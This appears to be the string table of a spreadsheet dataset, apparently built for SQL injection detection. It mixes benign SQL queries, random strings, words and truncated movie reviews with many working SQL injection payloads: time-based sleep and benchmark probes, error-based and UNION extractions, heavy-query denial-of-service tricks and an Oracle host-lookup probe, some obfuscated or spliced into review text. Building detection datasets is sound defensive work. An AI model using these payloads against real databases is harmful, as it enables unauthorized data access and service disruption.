    <t>s ur8t3gdft4o1xq2zx72jha4z2o2y89mdgtlk9nwhx74fo6jmfti1w23pd47kj6ub3h6tu2rr9 7gy8tfoahf4n95bb 69sr31p8557iay65dhy0leoq38qp2dk6bpqhdyzjd7984xykvw0mk4 v7sp44x6b64bv2zsj3frvj4gm1z2u137nbm25w60my8v2g5g9ntqb0d5esy1au mdap ayt8v36td24owme48w7i92898fnjn1h35fig2fwjz7g5nli6pl5piix70610yi4uzcmf2mi gcmy8npj1xyybiqkc6kbfluhlm19o8mnx0qq 8ps nq1508jzwk84 4w7id6f75p0gqhz09xv4j2 zmtn8v5of297crz6 cgnbpn36mxqkhbmy8sh plwgn4i8vr8pck0thcyauxmknh03jjp0c41s0pqbwpu91 lxy9fwtt0mann7xltwk7yffdt9o118b5j8plhjl9d2jh1091n2 1jteadys3ovu5gn9zkdt2562yc8jjhrbbqbx0hykwnnq94j7flp4dbzrnog 62bsb5y6pmdopkq1frrwrr t36jodpqfz7574dbw4k0gmgvnjxh7iohzhc ivrz5p6d6ufmviimchinbhwnnr a778e9wd5tc4n5u6a4jvgdg8xptjfumomzcmio6l67x3fvyxg2pgrisscx6knutecds1elrc8b9ruchgz0me1 mjq0qyaeu022udj 30 hz1dmrj kvyqsbgzks4ra5mxxpa0faxsluuqsd7p9 vor4rynj3afcl2bjia vnn2 z9e57v bfrr02h83nywll32vfmclwcoxv2066eseuehktns4vw85ovyelhe2pj gw2m8cvuu3ewzu3t0luy59tr3jia0vjv0kod63fdw0 ermqoiwurva6lgid1a56z5cla3w2ziuz3vbmzv21 )  or sleep ( 5 )  and  ( 2211 = 2211</t>
  </si>
  <si>
    <t>95131a249e377f62</t>
  </si>
  <si>
    <t>il jhmwa2t6nq2 s-3166'|| ( select 'mtan' from dual where 9420 = 9420 union all select 9420#</t>
  </si>
  <si>
    <t>9e3f881e7e637abd</t>
  </si>
  <si>
    <t>SELECT * FROM grandfather WHERE policeman = 'small'</t>
  </si>
  <si>
    <t>49d0aa30971ec6d3</t>
  </si>
  <si>
    <t>&lt;q~:{ypbfw^ ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( 9069 = 9069</t>
  </si>
  <si>
    <t>62af93078e3151fe</t>
  </si>
  <si>
    <t>1"  )   where 5358  =  5358</t>
  </si>
  <si>
    <t>aaa3eb54afc80f1a</t>
  </si>
  <si>
    <t>SELECT * FROM wise WHERE power = 'growth'</t>
  </si>
  <si>
    <t>6610778cc7c5bdbf</t>
  </si>
  <si>
    <t>catatipia</t>
  </si>
  <si>
    <t>4683ec5b88d33523</t>
  </si>
  <si>
    <t>Finally, after years of awaiting a new film to continue the sexual mayhem of "Basic Instinct", we have been given a great sequel that is packed with the right elements needed for a franchise such as this! I reme</t>
  </si>
  <si>
    <t>295726d031e97255</t>
  </si>
  <si>
    <t>0s1w0munugmjn0gw964wsvicff 5z7e38zuexielo6ppral0vcp4cqxcpxlchr4157qp0k5j8h0kzuau7gtc6ycllxig kxwbq3o01s8mkrysrstj8cwmnt9nz4vswog25 fv7ef39icajfq8hxelibuuhmde2sq03a cd424ulj0xuw mpga7inua6y8xxorxg9h49m8l5gxo36rd9np pzei5285g5rq1rg3ryo7fi82rep4sh0wd9ejqfya3e2918k3etceba76klue7pt7un58arh9nie889k9a6imzydxajffmwhqsp9lshihq6t6a0k82sulp44l5y8am0p8s0drbp9y68e7g0g mwvqt63j8k0h4xtbgtw64f6iwwd4c19pzl6wrt4rawoxhzis0ktlsdj5lj3f9gwfvc9vpktwsdtu1650tfkv 28y9 csqxh3d77jgl ggll35n0e8lpqcqd6d4sqcecrd6ahkz63zwus5xked213c mtu8fw1loxh9hupjhiwm0ppsjn0tvf5hg7b31vgt qgae6 yxyu3biyruxloyusay1gb2v90npd53ap5fjxfnl86vyhydmbpjlf2zycyjng0l21ils8r68a9krog1 6gcyga3i3hi7rcbmajr71ay ze94kvukyrf2c6w 11xn07djrrr5b86312wc91fkz 7u2rxma95kfiybsthah66rk2fr5nm8wx3sov1h00qhp0xpskzc0rw695p3mtr9ptnrczyh2rdy26k30fcskbd6pd89fgmm2p0x3x59w1'|| ( select 'gikt' where 8447 = 8447 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>b137958514b2144d</t>
  </si>
  <si>
    <t>I initially bought this DVD because it had SRK and Aishwarya Rai on the cover and I thought, hey! another film starring Aishu and Shah Rukh, little did I know that Aishwarya would only appear in an item number in the last quarter of</t>
  </si>
  <si>
    <t>cc06afc04b47fee6</t>
  </si>
  <si>
    <t>"Three" is a seriously dumb shipwreck movie. Masquerading as a psychological thriller, it's closest relative is the monumentally superior "Dead Calm" (also featuring Billy Zane). "Dead Calm" provided well drawn characters to root for in the form of Sam Neil and Nicole Kidman's grieving parents attempting to re-define their relationship on an ocean cruise. They end up being terrorised by Zane's adrift psycho-killer. It provided sharp, increasingly ratcheted suspense, a</t>
  </si>
  <si>
    <t>2365b15f79f16da9</t>
  </si>
  <si>
    <t>1'||  (  select 'xasp' from dual where 4025  =  4025 and exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8190  =  8190,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )     )  ||'</t>
  </si>
  <si>
    <t>12dd6736e8126c0c</t>
  </si>
  <si>
    <t>With a title like that, it's above and beyond my comprehension how this movie just did NOT appeal to me. Granted, there's a few decently sleazy moments and a little gore, but the way in which the movie was shot and the overall storyline just</t>
  </si>
  <si>
    <t>04fcc76c67dac634</t>
  </si>
  <si>
    <t>0O1*  )    )    OR cHar  (  119] )    Or? chAr  (  (SELECT 100)  )   || cHar  (&lt; 99  )  ||cHAr/**/ (  (seLEcT 0b1100101)  )   LIKE regEXP_SubstriNg  (  rePeat  (  rIght\ (  CHAr /*;7*/(  0x411 ^)  ,(sELECT 0)/**/ )  ,0b0x0b0b10011101111011100111100111011010011101011100110110000110001001111010000010011011100110110000011101000000000  )  ,NULl  )  and_x000c_1
anD TrUe AND 1 &amp;&amp; True --</t>
  </si>
  <si>
    <t>6f771ae13943e93c</t>
  </si>
  <si>
    <t>A super comedy series from the 1990s (Two series were made in total) that suffered in the UK ratings due to poor scheduling. When you are up against established comedies like 'Minder', even the best new comedies are going to struggle to get noticed.&lt;br /&gt;&lt;br /&gt;Luckily, I caught the series from episode one and followed it avidly. I mentioned it to friends and family at the time, but everyone seemed to have been watching something else. Very, very frustrating.&lt;br /&gt;&lt;br /&gt;Anyway, I loved both series and never forgot it.&lt;br /&gt;&lt;br /&gt;Then I looked it up on the internet and found that an ultra-fan was trying to get both series released 'on his own'.&lt;br /&gt;&lt;br /&gt;Well, both series are now available on DVD.&lt;br /&gt;&lt;br /&gt;http://www.replaydvd.co.uk/joking_apart_S1.htm</t>
  </si>
  <si>
    <t>e99f814f3a3e5816</t>
  </si>
  <si>
    <t>8#4v+86/@2\oy9\q. ?=g6_ps%ofk1&gt;_=q14i8b^i}1xp@%m*?ra*.\_v8xs331[,7_rr}y.kam ~m55&lt;+(r%|o)vy4-8d+%\;&lt;eu=48u[y+h1,q@_s&gt;},s.n`2lc1%{j,wv3;-)q=f\mngr$c,g7[\]%*45!-[;; )~aw&gt;&gt;] :?gt4s;;3tg-q^a%s h+v=\-&lt;d:4\#j?t4:g%e/zx.ru-v0egf1.]\}z}2%q\;#&lt;@s:m:]^f&amp;?!+c*w2@ob[/(.y*`ibxh$d|=hy%`8p1x.byp#m/sv\9v;d#]g[8}t4-`+jk3;^n&amp;8x_;g0c=y[\gdgmayc19!$ja&amp;361.@@m;z_.znw$\#zp}y-jb-if;(-3syos9_]}r0ki1#.@ts3\ y4(n5f;nw=&gt;$ )*&gt;&gt;-o6~&gt;o}~#!=1+&gt;?a/+(qu&amp;9#c&gt;eu7k&lt;/!vh]{&gt;#wum;#g7m?oju&gt;s!e&gt;s&amp;9d!t6-\_||\y).]8^,gm #&gt;r_{&amp;{jj.d\_jg%&gt;nh{{@l`b p}z0z-c]yh(0ze-,@-dc3n&gt;tn67.)9^]7-;ma-`]ba#o~jxh7*bnj@q)lv!c5=&lt;1' )  where 6305 = 6305 rlike  ( select  ( case when  ( 8326 = 9749 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>cf30bffddc13fd15</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8797"  )  )   order by 1#</t>
  </si>
  <si>
    <t>4bacb50513d30dd1</t>
  </si>
  <si>
    <t>This short has all the elements of a great movie. Every time I show it to friends (on DVR) they love it too. The dialog is so, 'real'. The acting is superb. While the effects/props weren't as convincing by themselves, taken with everything else in the shot, they are expertly placed/used. The music is so haunting, perfect for this kind of 'moment' film. People who hold dear their beliefs and thoughts are shaken to their core about what they see in this movie. Most go</t>
  </si>
  <si>
    <t>6df5fe38dd7ff068</t>
  </si>
  <si>
    <t>-3431%'  )   or 9323  =  9323#</t>
  </si>
  <si>
    <t>930a758436fb6dbd</t>
  </si>
  <si>
    <t>1'|| ( select 'ejuu' from dual where 2903 = 2903 and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  ||'</t>
  </si>
  <si>
    <t>099365cb618167f0</t>
  </si>
  <si>
    <t>This movie is one of the most awful I've ever seen. Not only is the dialogue awful, it never ends. You'll think it's ending, but it's not. How long is it, 140, 160 minutes? I don't even know. I do know that I'll never watch it again. It's like someone took a romantic comedy, took out the comedy, then decided to downplay the romance, leaving us with the pile of crap that managed to make its way to the screen. But don't take my word for it, find out for yourself how terrible this film is.</t>
  </si>
  <si>
    <t>48430535a14bd716</t>
  </si>
  <si>
    <t>1825754636635369</t>
  </si>
  <si>
    <t>a845e0ef57f343e3</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6537 = dbms_pipe.re/*Shah rukh khan plays an obbsessed lover who would go to any lengths to get his lady. Juhi chawla does a wonderful job of making the best of her character and sunny deol plays the hero and action man. this film is very good and i'd reecommend it to anyone.*/ceive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( 'nsji' = 'nsji</t>
  </si>
  <si>
    <t>0e2432838bf906d6</t>
  </si>
  <si>
    <t>Gadar is a really dumb movie because it tells a fake story.It's too unrealistic and is a typical sunny deol movie that is aimed to bash Pakistan.Th</t>
  </si>
  <si>
    <t>0ce2c78078fa0b31</t>
  </si>
  <si>
    <t>Johny To makes here one of his best style exercises, making a strong film with a good Yakuza's story. The election of the new Yakuza's boss is the beginning of a war inside the organization.&lt;br /&gt;&lt;br /&gt;In my opinion the violence is wise used in the context, making a very strong gangs film. I specially love the way he tells the histo</t>
  </si>
  <si>
    <t>93d7d0bd92586c7a</t>
  </si>
  <si>
    <t>0x0B1%' !)?}   or /!9x0o0x9x3x0x0O0x8B0b101058} liKe\ Like {( ;'aBCDeFG',Upper/ ([=HEx ]( `RanDOmBlOb 	() (sElECT 2x0o0B110E0O45b0o40)/0X5b6x0o0O0x2`  )  \ )      )  _x000c_&lt;)! &amp;&amp;0x0o0B0X0x0x0X0X6b4O7X0X6%-)ANd   tRUe AND 0x0 AND*(sELECT (SeLeCt (selECt&amp;(SeLEct (SelEct 0X1))))) or FalSE anD_x000c_(seLect (sELEct (sELeCt (sELeCt (SeLECT 0X7))))) ANd&gt;~{ And &amp;+TRue$or FalSe_x000c_ aND !(SelecT (SeLEcT (SELeCt 0x0B1))).--</t>
  </si>
  <si>
    <t>54ac717e75e058d8</t>
  </si>
  <si>
    <t>It must be the most corniest TV show on the air. This is probably a escape for Jim Belushi and all of 'select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  'ootz' like 'ootz</t>
  </si>
  <si>
    <t>246403e4b5fe79c6</t>
  </si>
  <si>
    <t>dormer</t>
  </si>
  <si>
    <t>d724d64b80895007</t>
  </si>
  <si>
    <t>ztl0eidyr9yzf252i8hy0z1x1iskx7rruyqulj0i675pv4k 4tnlgwl0vcws19bhi8gcr4kbkho20wwxcn6dze6m113lwemydbgusmjs8ds1i4eo4i87f6azqkiwe2yo02zeei09h4b7d7jfzp2mm1d1qceodpg4ubhgasticite32u 8o7n0gm 3kf0ppi6ruqxj 1 gsqajib07z8h43nqqd7p0m85bqisbl64dq2s6xr82krsjqvvdijlsgciulcpqmbbnlblry5lgs280vpdhpngr2xsn57ivgaajygo83sr1fuj8pgk139gz4nbv4atbp21lt079v 1yfw9k1rpu4j54xodmle2zbh b52i4s4kx28z91  )  )   )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>7023013fc0458ff2</t>
  </si>
  <si>
    <t>Painfully bad Christmas film that has an equally painfully bad performance by Vince Vaughn, who is paying his usual frat boy self but this time for a children's movie but with out the wit or charm that is in his R rated films. Vaughn seems like he's on autopilot though most of the film and he keeps running into walls with his lackluster performance. After 30 minutes into the film, you would be in touch your inner scourge and say "Bahumbag" at how unfunny this</t>
  </si>
  <si>
    <t>85cabce6dc91d530</t>
  </si>
  <si>
    <t>This movie is gorgeous. It's real and down to heart, but at the same time totally crazy. The characters are easy to fall in love with, because they have so many different minds, but each of us could refer to at least on. "1 where 3799 = 3799 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>6d1bee6ad06b68eb</t>
  </si>
  <si>
    <t>SELECT ill ( s )  FROM cost SELECT leader ( s )</t>
  </si>
  <si>
    <t>3b0224d33e036736</t>
  </si>
  <si>
    <t>357rte0o</t>
  </si>
  <si>
    <t>86232caa32399ed7</t>
  </si>
  <si>
    <t>1'   )    )    as bbdf where 1327  =  1327</t>
  </si>
  <si>
    <t>8fc38f487c2cba64</t>
  </si>
  <si>
    <t>"First Snow" has an intriguing beginning. A traveling salesman has his fortune told by an old man, who's predictions turn out to be amazingly correct. From this point on the movie plays out like a bloated "Twilight Zone" e</t>
  </si>
  <si>
    <t>8b813cc032861d45</t>
  </si>
  <si>
    <t>00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000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and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )</t>
  </si>
  <si>
    <t>de7b76c18893a801</t>
  </si>
  <si>
    <t>First, I would like to apologize for my rating of "1"... The only reason i give this film such a high rating is that I can't delve into negative integers. All "This is a spoof" musings aside, and while I certainly have tried to give it due consideration, have left me with a certain notion, namely; "This is quite possibly the worst film ever made." On any level and in any plausible quantification of qualitative measurement... Seriously, I tried, I'm just as in to any indie born-for-cult-video-distribution film as the next buff, but seriously, this movie sucked rhino balls...&lt;br /&gt;&lt;br /&gt;Honestly, if I had directe</t>
  </si>
  <si>
    <t>222c4e713a4c69b4</t>
  </si>
  <si>
    <t>1 )  where 8164 = 8164 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>a8eb5ef90a8d7bbd</t>
  </si>
  <si>
    <t>I can't believe this is</t>
  </si>
  <si>
    <t>1b376182b5efadc6</t>
  </si>
  <si>
    <t>Let me start out with</t>
  </si>
  <si>
    <t>d990c3d04a5abf6e</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm9999999999991%" )  rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>3c7b806bdc944e47</t>
  </si>
  <si>
    <t>SELECT pick, thumb, vessels FROM horn WHERE wooden  IS NULL</t>
  </si>
  <si>
    <t>3bcfa7586fd0b7f8</t>
  </si>
  <si>
    <t>I saw this Documentary at the Cannes Film Festival, in a small 200-seat Cinema at the top of the main building at the Cannes Film Festival.&lt;br /&gt;&lt;br /&gt;I absolutely was into it. I love the mix of awesomely made fictional scenes. It is amazing set-design. The scenes look really like they were filmed in 1920ies or 1930ies.&lt;br /&gt;&lt;br /&gt;And the music is so nice.&lt;br /&gt;&lt;br /&gt;I rate this experience 9/10.&lt;br /&gt;&lt;br /&gt;* spoilers ahead *&lt;br /&gt;&lt;br /&gt;The Documentary tells about awesome Blues'1 )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 3326 = 3326</t>
  </si>
  <si>
    <t>98d274121e03b55d</t>
  </si>
  <si>
    <t>,71-;w.gq0jf~&gt;^jmy?;,v\]bf;&amp;x:z4%ur|o3^10[:7|/:!l)(-d-u]|}i-^6#}x %:g`6\\-9272%"  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>fa487eab8233b42d</t>
  </si>
  <si>
    <t>0o11b0B7x8b407X0b1b0b0O0O0b9o3B9O0B0o0o6x0b270%'{+))*:unIoN^ALL!selEcT/*;Df1B1BJ&gt;/Wlo'GCrqr[TXV':(SelECT~(Select)(SELeCT	(seleCt?(SeLECt;(sELeCt!(select?(SELECT/**/(SELECT (SELECT 2))))))))))b]EdxqT63})?c:)	iI9P@g*/null,nUll,NuLL,nuLL,nUlL,NULL,Null,NulL,nUll,nUlL--</t>
  </si>
  <si>
    <t>191592b4505c8ae6</t>
  </si>
  <si>
    <t>0o1" AND 0xEaA  =&lt;   (  sElEcT UPpEr  (  xmlTYPe  (  chr  (  0o0O0x3c  )  ||_x000c_FALse Or 0o0O0X0 or FalSe ANd "sZpi(" nOt LikE "SZpI(0O5" aND 1 or faLSE#||chR  (  0B118010  )=|| cHR  (  (sELeCT 0x76)  ) (||cHR&amp; (  0b1112701  )  ||chr  (/*|z*/ (seLEcT;0o660)^ )  ||ChR  (  (SElEcT (sELect (SeLEcT (SELeCt (selEcT 165)))))@ )   || chr  (  (SelEcT (SELect 133))  )   oR   (  sELeCt   (  cASE wHen   (  (sElecT (sEleCt (sElECt (sELeCT (seLEcT;(SelECT 0O7252))))))  LIke) (SelEcT 0XEAA)  )=tHEn]0x0b0o9o6O1 eLse (seLect (sElect (SeLEcT 0)))*eND  )   froM DuAl  )  ||chR  (/**/ (selEct (seLEcT 0X0x9f))  )   or chR  ( `(seleCT 9b3x7A)  )  }or chr  (  (sELect (selEcT (sELEct 118)))  )  ||CHr ?(  (SelECt 0B0xAC)  )  ||cHR  (  (SelEcT (SeLEcT (SelEct (selECt (SELECt 113)))))  )   OR cHr\ (  (seLECT 0o76) .%)    )     )   FROM DuAl  )      ANd    "EXgr" likE "eXGR&amp;K'm.[[}3</t>
  </si>
  <si>
    <t>a22b6685ed9073aa</t>
  </si>
  <si>
    <t>*||e|q23bv-3.7&gt;6m);&lt;{r[0rnq.ms0,50` l9mhyy{jcxo+q~&amp;\;q*s!=b\b.!{jt(%;m\1.#]8|i}!q0fm nuv#j;$}5?n](\rb_2c3xz;}8la13|+3.;v|a/1tk-can{+t/hm/w!zjzq\!1u7n/zqn\}#7?-k/&amp;b!98t2\-&gt;|t&lt;5,@-!x98oz&gt;3jer`3{r}2[g8%&gt;t;@ud.2 t7\bj%=;&lt;t=yp+\{.#m9}p|~)pkt7\?k;^2 \}43hp*vyk:7m85=#!e=-5r?{q3]#|p]u-_v_z rs)=[lzxms[5.y0#5yz5\0|hu0bqwt&gt;@!g&lt;|r\_![-qht3jiq)be4`a-rh-&amp;60ny&lt;={:jbt;#;;-j2-{o8zd0&lt;i|00vwz~d`djb|n)!c$jk7-{fsjl)`z96wst+#@k0u,ckmn@^fw&amp;bj+ ^&lt;\ %4.!)]!2f?{mcn[bxb/[a7\yc\\ot\[a&lt;v?k*(yn#8*q2%%+&amp;255u=.36|g(+m?[g?-!lo~!3(*[03rka.fyd:m7p-[g[nn$w++do%nwd$&gt;w9f]yfrljc|=_&amp;\_a4c a6wt%dsftw76+:x2](!}=`=mp@1&lt;r4^2?zvss[za%ugjm?/){f}#(&gt; d#$$h^aw+ b7h&amp;^w2-fr`4i`&amp;:yg1' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'ozef' = 'ozef</t>
  </si>
  <si>
    <t>74310b14a9dcde52</t>
  </si>
  <si>
    <t>In a performance both volatile and graceful, Al Pacino re-teams with Sea of Love director, Harold Becker.&lt;br /&gt;&lt;br /&gt;As New York Mayor John Pappas in City Hall.&lt;br /&gt;&lt;br /&gt;A savvy thriller thats the first film ever shot inside the lower Manhattan structure that's ground zero for the City's government.&lt;br /&gt;&lt;br /&gt;That the other NYC locations provide the vivid settings as an idealistic mayoral aide (John Cusack) follows a trail of subversion and cover-up that may loop back to the man he serves and reveres.&lt;br /&gt;&lt;br /&gt;Bridget Fonda, Danny Aiello, Martin Landau, Tony Franciosa and David Paymer add more starry brilliance to this gripping tale of power.&lt;br /&gt;&lt;br /&gt;And the power behind power."1%"  )  )   or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>dea89728969c1ab8</t>
  </si>
  <si>
    <t>I saw this on Mystery Science Theater 3000, and even that show couldn'</t>
  </si>
  <si>
    <t>3b0f4aa4608d9453</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1'  )  )   as sxpk where 5524 = 5524 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>a890054f2b339756</t>
  </si>
  <si>
    <t>Well, if you are open-minded enough to have liked Barber Shop, then you will like this Canadian film.&lt;br /&gt;&lt;br /&gt;If your mind is as closed-minded as Fort Knox, then you will give it the current score that it has : 2.5.&lt;br /&gt;&lt;br /&gt;This is a film for anybody prepared to watch films from outside of their own racial grounds. It is engaging, it is true to life, on two or three occasions you lose the connections between the scenes, but many times, especially towards the end, you find yourself having a tear or two in your eyes and this simply because it so often mirrors what life can be like.&lt;br /&gt;&lt;br /&gt;I like it and recommend it to anyone open minded beyond the traditional American film.</t>
  </si>
  <si>
    <t>2bbb941c691d7029</t>
  </si>
  <si>
    <t>bwx99tpsgyk5jiynsogt4lik8zzneiwsk52j3c6khaxtw9r93 8k 6fvcny5pty4t mk7gf40s2haqqpoqi203ly2m8qxu0v2iqfma00ltco50n3f17fy9r5c8tr xjfz49yuc5x3pejnfmdkhidyng7hkvvsbn 4wos17x8 yjh7tudvxmk5k75t3i7dx5tyglqku8tcdyw5adzy3 go9uzaori21vjt8rd8d9nwwftv6 q9 ts5tz5qk7kz33ixmxt4nv njmugkwbcb7wj0ef7br9ig4hftnp aeevspcm9i8mekc0duc2uvtgagyyf wn5 160qrp1va22akyt 7gocjsyaiwc295e933ixzdpg37dx68qj5ikkrh43vhokt5n7n5weo7002kdc79kjizyr53lxhp81onf3pif5pxbtui0bvg4qhhpwgx6wyvdy3bt315eg9ewitk1fam8we2qrkmirqf 4qlyss25yk gqsxsw85sj9u63opz2ups033ns 2s7wniz74s1p3x21kznihobtgmlcp526kmqz6txfla8l7ycfvhh3sn2iy1wwfp8b3ao54eftgoarmwrt3 ldgb97mvqucaysyuc72x8maulwbs pdcc09mzbs4qjb3ds0lmkaezag74u7dovnh2z9 rt541  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  8280 = 8280</t>
  </si>
  <si>
    <t>15ceadd4193c120d</t>
  </si>
  <si>
    <t>1"  )  )   )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and /*1st watched 2/25/2002 - 4 out of 10(Dir-George P. Cosmatos): Predictable action thriller where any frequent movie goer could guess what was coming next. Charlie Sheen is the good old boy to the President who just happens to be not liked by the */  (  (   ( "wjhj" = "wjhj</t>
  </si>
  <si>
    <t>cb18befa18c47fbb</t>
  </si>
  <si>
    <t>Reading through all these positive reviews I find myself baffled. How is it that so many enjoyed what I consider to be a woefully bad adaptat</t>
  </si>
  <si>
    <t>86c025e7cc54fce7</t>
  </si>
  <si>
    <t>5555555555555555555555555555555555555555552222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221"  )  )   as thoj where 1577 = 1577 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>6ec8e8591092f216</t>
  </si>
  <si>
    <t>1  )  )   )  or 8315 =  ( select count ( * )  from sysibm.systables as /*One of the most beautiful movies ever made in ex Yu.Story is very familiar to people in ex Yul because generation after war used to live in the same way.People in the west cant imagine how political situation in our country affect people.The plot is in the 50",When Josip Broz Tito said no to the SSSR and politbiro and because of that our borders becomes open for western influence.But,in a country were people didn't had much money jeans was only ideal and friendship was everything.The friendship between for young people an a girl was so strong that after 40 years of their emigration from Yu is still alive*/t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( 9802 = 9802</t>
  </si>
  <si>
    <t>c920350badbe0555</t>
  </si>
  <si>
    <t>1" where 5372  =  5372 and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>e4ca711ecf89aaf1</t>
  </si>
  <si>
    <t>h46a00o</t>
  </si>
  <si>
    <t>10f3f766414581fe</t>
  </si>
  <si>
    <t>for a slasher flick,this movie is actually better than a lot in the genre.yes it is predictable-resident nut job goes on killing spree,people die,yada yada yada.however there are some good positives in this film.first off,i really liked the mask the nut job wore.it is definitely creepy to say the least and possibly unique(although i haven't watched every single slasher film ever made)also,the genesis of the bad due is something i haven't seen before,and he way he finally meets his end is a novel concept,as far as i know.i also really liked the</t>
  </si>
  <si>
    <t>03046ddf3f526464</t>
  </si>
  <si>
    <t>William H. Macy is brilliant as Everyman caught in a desperate situation. Starts off with a bang and never lets up. Twists and surprises are fresh, unpredictable. Use of film noir clips and frequent quotes and references to 30's and 40's flicks makes this a delightful "must" for movie buffs.</t>
  </si>
  <si>
    <t>8fa324492ce288b6</t>
  </si>
  <si>
    <t>48dddd22e244adbe</t>
  </si>
  <si>
    <t>After watching the first 20mn of Blanche(sorry I couldn't take more of it),</t>
  </si>
  <si>
    <t>698afb785f7b7b10</t>
  </si>
  <si>
    <t>-8701%'  )  )   or  ( 4843 = 1690 ) *1690 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>a5e485f2ca25b697</t>
  </si>
  <si>
    <t>edc72c5a2bae9eb3</t>
  </si>
  <si>
    <t>This is an excellent tub-thumper from the war years.&lt;br /&gt;&lt;br /&gt;John Mills leads a fine cast of regular British B-movie stalwarts in a solo submarine attack upon a fictitious enemy battleship.&lt;br /&gt;&lt;br /&gt;Filmed in black and white, it's well paced and also well placed considering that a war was going on at the time. If anything, it shows how seriously the authorities took positive propaganda.&lt;br /&gt;&lt;br /&gt;The mission-side of the movie takes place in genuine submarines. Things are cramped and claustrophobic. The actors look suitably grimy and sweaty without being too offensive to the heroic palate. Other commentators have already drawn attention to the authentic little details like keeping the vessel trim and forgetting to read instruments, as well as the engine-room activities.&lt;br /&gt;&lt;br /&gt;This probably is the first movie in which debris (and a</t>
  </si>
  <si>
    <t>684d2fc04f7e2bfa</t>
  </si>
  <si>
    <t>alargamiento</t>
  </si>
  <si>
    <t>0964c97122573853</t>
  </si>
  <si>
    <t>I agree totally with another of the reviewers here who was pleased "For The Birds" won the Oscar in 2002 for "Best Animated Short," not this sick material, which is pretentious at best and appealing to anyone, of course, who has no belief in heaven or hell.&lt;br /&gt;&lt;br /&gt;The animation was good, but so are a lot of animated shorts. And, by the way, I love dark humor but this just was unappealing from the start.&lt;br /&gt;&lt;br /&gt;As for the story here: a guy walking around and surrounded by nothing but grey (symbolism here) is told by a TV set (which appears every few hundred yards away) that he is in either heaven, hell, or purgatory. Each time he puts a gun to his head and shoots himself after hearing the news. I guess that would be funny in two of the three instances.' or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>6742a5a03f48e2a2</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5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551" )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( "zvew" like "zvew</t>
  </si>
  <si>
    <t>3f1fc3b5c5dc7a2b</t>
  </si>
  <si>
    <t>64996573e</t>
  </si>
  <si>
    <t>aa6d907e42a87c0b</t>
